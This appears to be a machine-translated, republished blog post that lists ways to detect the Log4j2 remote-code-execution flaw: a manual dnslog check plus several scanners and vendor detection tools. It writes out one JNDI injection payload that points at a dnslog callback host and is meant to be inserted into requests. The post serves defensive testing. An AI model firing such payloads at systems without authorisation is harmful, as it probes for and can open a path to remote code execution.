当前位置:网站首页>Log4j2 vulnerability detection tool list

Log4j2 vulnerability detection tool list

2022-06-25 20:19:00 Bypass--

distance Log4j2 It's been a month since the vulnerability was exposed , The serious impact it has caused does not need to be mentioned again . as time goes on , New vulnerabilities will continue to emerge , Old loopholes will continue to disappear , And this Log4j2 Medium RCE Vulnerabilities can take years to resolve . therefore , In the next period of time , This loophole is still the focus we need to pay attention to .

This paper collects and sorts out several vulnerability detection methods and tools , For use Log4j2 Vulnerability detection and self inspection .


1、dnslog Manual verification method

First, in the dnslog The platform obtains a subdomain name , Try to construct payload, Insert request packet .

${jndi:ldap://bypass.fzuqgl.ceye.io}

dd57d91e06afb32b10c22aacdcac55e9.png

adopt dnslog Whether the platform receives the request , Preliminarily judge whether there are loopholes in the target environment .

df548da8ad0cc2a3eddb542d5f6ac24a.png

2、Log4j-scan

One for finding log4j2 Loopholes python Script , Support url testing , Support HTTP Request the head and POST Fuzzy test of data parameters .

github Project address :

https://github.com/fullhunt/log4j-scan

2c187e5488d7b99636c755d3d26efe2b.png

3、Log4j2 burp Passive scanning plug-in

Through plug-ins , take lLog4j2 Vulnerability detection capabilities are integrated into burp, So as to improve the vulnerability detection ability of security testers .

github Project address :

https://github.com/f0ng/log4j2burpscanner

Log4j2 burp Passive scanning plug-in effect :

c8212c0ee70c30deb51aaa37e6e449c5.png

4、AWVS scanning log4j2 Loophole

AWVS14 Latest version support Log4j2 Vulnerability detection , Support batch scanning , Vulnerability scanning artifact won't let you down , Get ready to update the Arsenal .

060cf35d14eb7025d94de3d61a9dda9d.png

5、 Product grade Log4j2 Vulnerability detection tools

This testing tool is based on Tencent security binAuditor, Support Jar/Ear/War Package upload , One click upload to get the test results .

Detection address :

https://bsca.ms.qq.com/

Jar Packet test results :

5945812c0cad9b0f6f4dfa23e1bbfb3b.png

6、Log4j2 Local detection tools

Extracted from Changting Muyun products Log4j2 Local detection tools , It can quickly discover the risk of the current server log4j2 application .

Log4j2 Vulnerability detection tool address :

https://log4j2-detector.chaitin.cn/

d4d7c0a5f944a7cbd823796899703bd2.png

7、360 Log4j2 Test kit

Browser passive scanning + Local detection tools , Provides a complete Log4j2 Vulnerability detection scheme , in addition , The toolkit also includes Log4j2 Patch scheme , Here's the picture :

3efaa94d8ba7b8e39dc12cca03c8e654.png

原网站

版权声明
本文为[Bypass--]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202190501549106.html